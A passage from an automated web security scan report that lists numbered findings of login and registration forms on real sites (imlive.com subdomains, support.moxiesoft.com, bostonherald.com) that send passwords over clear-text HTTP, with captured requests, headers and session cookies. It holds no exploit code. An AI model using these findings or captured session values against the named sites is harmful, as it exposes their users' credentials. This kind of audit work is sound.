Set-Cookie: spvdr=vd=4fbca91b-ec62-43d7-a59a-b2e914467e3f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:35 GMT; path=/
Set-Cookie: iin=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:35 GMT
Connection: close
Content-Length: 20907
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.18. http://it.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://it.imlive.com/members.aspx (method POST). The form contains the following password field: txtPassword

Request

GET / HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=yioqjz3reg4ourimvrkbrbrd; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=yioqjz3reg4ourimvrkbrbrd; path=/; HttpOnly
Set-Cookie: spvdr=vd=d3cc5bc2-bab2-416e-acff-891f674e66d4&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:49 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:49 GMT
Connection: close
Content-Length: 18113
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.19. http://jp.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://jp.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://jp.imlive.com/members.aspx (method POST). The form contains the following password field: txtPassword

Request

GET / HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rgsy1a453yb3np55fmwslhyw; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=rgsy1a453yb3np55fmwslhyw; path=/; HttpOnly
Set-Cookie: spvdr=vd=eb9d52f6-9629-4754-bdff-f15e37967440&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:02 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:02 GMT
Connection: close
Content-Length: 19088
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.20. http://mx.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://mx.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://mx.imlive.com/members.aspx (method POST). The form contains the following password field: txtPassword

Request

GET / HTTP/1.1
Host: mx.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wytymorw54fw1s453wwi1b45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wytymorw54fw1s453wwi1b45; path=/; HttpOnly
Set-Cookie: spvdr=vd=a13018e7-4eaf-491b-9a58-2a08ebf5d10b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:13 GMT; path=/
Set-Cookie: imx=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:13 GMT
Connection: close
Content-Length: 18291
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.21. http://nl.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://nl.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://nl.imlive.com/members.aspx (method POST). The form contains the following password field: txtPassword

Request

GET / HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=de304g55lx13wkfega5qpc55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=de304g55lx13wkfega5qpc55; path=/; HttpOnly
Set-Cookie: spvdr=vd=172f260c-f292-40e5-922e-4377befca272&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:14 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:14 GMT
Connection: close
Content-Length: 17934
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.22. http://no.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://no.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://no.imlive.com/members.aspx (method POST). The form contains the following password field: txtPassword

Request

GET / HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=aqcwk4afu03wgg45ktqavz45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=aqcwk4afu03wgg45ktqavz45; path=/; HttpOnly
Set-Cookie: spvdr=vd=cb56a9d1-56fd-458b-a829-3574e99ee9f7&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:16 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:15 GMT
Connection: close
Content-Length: 18070
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.23. http://pu.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://pu.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: http://pu.imlive.com/members.aspx (method POST). The form contains the following password field: txtPassword

Request

GET / HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bvm3hmbu4vshg5ioczqvkua2; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=bvm3hmbu4vshg5ioczqvkua2; path=/; HttpOnly
Set-Cookie: spvdr=vd=17b1032e-9627-4037-aed9-7b33fd1318f1&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:19 GMT; path=/
Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:18 GMT
Connection: close
Content-Length: 20659
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.24. http://ru.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://ru.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /members.aspx (relative to http://ru.imlive.com/).
The form contains the following password field: txtPassword

Request

GET / HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ligj3o45prg41k55vc4qg52m; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=ligj3o45prg41k55vc4qg52m; path=/; HttpOnly
Set-Cookie: spvdr=vd=5d548b95-834a-4b5b-a38b-38fb7d9bb957&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:20 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:19 GMT
Connection: close
Content-Length: 20234
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.25. http://se.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://se.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /members.aspx (relative to http://se.imlive.com/).
The form contains the following password field: txtPassword

Request

GET / HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wl23onyo1tkdis45s1sxe545; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wl23onyo1tkdis45s1sxe545; path=/; HttpOnly
Set-Cookie: spvdr=vd=bb5a5452-c2c5-404a-ad75-499130dd5dbd&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:21 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:21 GMT
Connection: close
Content-Length: 18020
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.26. http://support.moxiesoft.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://support.moxiesoft.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: login.asp (relative to http://support.moxiesoft.com/).
The form contains the following password field: txtPasswd

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25701
Content-Type: text/html
Expires: Fri, 28 Jan 2011 14:10:59 GMT
Set-Cookie: ASPSESSIONIDQCSSSRRR=PBGDKLDBKDBENNBAFHOIFDGM; path=/
Cache-control: private


<!--
Function getOwnerIDforUser(sEmailId)
   Dim objUser
   Dim sSql
   Dim objADOConnection
   Dim sconnString
   Dim objOwnerId
       
   Set objADOConnection = Server.CreateObject("ADODB.Connection")

...[SNIP]...
<!-- login box starts -->
                                   <form id="frmNewLogin" name="frmNewLogin" method="post" action="login.asp">
                                   <input type="hidden" id="txtProductID" name="txtProductID">
...[SNIP]...
<td width="150"><input type="password" name="txtPasswd" id="txtPasswd" /></td>
...[SNIP]...

6.27. http://tr.imlive.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://tr.imlive.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /members.aspx (relative to http://tr.imlive.com/).
The form contains the following password field: txtPassword

Request

GET / HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=pmrw12jgsksj3kvxm3majzb2; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=pmrw12jgsksj3kvxm3majzb2; path=/; HttpOnly
Set-Cookie: spvdr=vd=1b813c63-80cf-4620-830f-91884d66145b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:32 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:32 GMT
Connection: close
Content-Length: 18499
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d
...[SNIP]...
<div id="ctl00_pnlSignUpHome" class="LoginArea">
   
<form id="frm" onsubmit="return CheckForm(this);" action="/members.aspx" method="post"><table border="0" cellpadding="0" cellspacing="0" class="lgntbl">
...[SNIP]...
<td align="left" valign="middle"><input class="InputHead" id="txtPassword" name="txtPassword" type="password" /></td>
...[SNIP]...

6.28. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: #comment_form (resolves to the page's own http:// URL).
The form contains the following password fields: password, confirm_password

Request

GET /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:20:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 79220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.29. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: #comment_form (resolves to the page's own http:// URL).
The form contains the following password fields: password, confirm_password

Request

GET /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:11:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

6.30. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: #comment_form (resolves to the page's own http:// URL).
The form contains the following password fields: password, confirm_password

Request

GET /business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 99426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
